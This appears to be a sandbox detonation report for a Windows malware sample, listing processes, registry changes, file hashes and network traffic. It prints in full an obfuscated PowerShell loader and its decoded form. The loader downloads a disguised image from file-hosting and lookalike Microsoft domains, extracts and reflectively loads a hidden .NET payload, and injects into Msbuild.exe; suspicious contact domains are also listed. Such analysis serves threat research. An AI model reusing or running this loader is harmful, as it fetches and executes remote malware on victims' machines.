| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff368746f8,0x7fff36874708,0x7fff36874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 94bd9c36e88be77b106069e32ac8d934 |
| SHA1 | 32bd157b84cde4eaf93360112d707056fc5b0b86 |
| SHA256 | 8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27 |
| SHA512 | 7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16 |
\??\pipe\LOCAL\crashpad_4048_NYEMDOTVAYUBLUHT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 25f87986bcd72dd045d9b8618fb48592 |
| SHA1 | c2d9b4ec955b8840027ff6fd6c1f636578fef7b5 |
| SHA256 | d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c |
| SHA512 | 0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dbb24d164504f325a569b4717af3f34b |
| SHA1 | 8646eae93c8874139d5a1a1272bcce3d2335eeb1 |
| SHA256 | 8a894748357645eb16ef5bcd6ee0acfbb4dfb278bc5e362ac0081d5fd4317fa7 |
| SHA512 | af0552ebde3aa89446fc2051518f983624e1f40560642a8d9d495afee86c20e775801a0c703a21c63785840fc90b8de06d6b3dab3b06487497ca9e281376aa9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ad50a53fe7b005cef48df60ef8bd2469 |
| SHA1 | 7ec7b557dfde99473f9b379a4ca7583f4976a374 |
| SHA256 | 80feb7d6ba4736405a37d5dff1abf624ad30f246e4b60caf739c2258ac9a3a50 |
| SHA512 | 7c2059614def99438781a3ae0c77fe0519a2fcf9b021bf5f08b34253cc41dc4239b802a1668144ed6c6229c419df75d9d307e6d2fa5fd569005209207abc69aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 690ac393efa65c81b05787f038874229 |
| SHA1 | db338df0a274fb22f127b4e073da1efae754c15e |
| SHA256 | d6e60bec2996040b9639f936d124aa6b33a543e9b4e4a9b8c482a596683545e0 |
| SHA512 | fddfe8ac715bd2158e69b26f00777a30b46b02287c1c6d3fb495f8463c3220844d62798430fbf05abb3fce3084cbe82c039cf2753969604f30a0f2e74c4b0782 |
Analysis: behavioral24
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1484 set thread context of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\SYSTEM32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 67bcef97a5ffe.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GY@ZwBo@Gg@a@Bo@Gg@a@Bo@C8@dgBk@GY@ZgBn@GQ@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@Gs@ZgBt@GE@agBy@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ofice365.github.io | udp |
| US | 185.199.110.153:443 | ofice365.github.io | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | tcp |
| DE | 62.60.226.112:80 | 62.60.226.112 | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
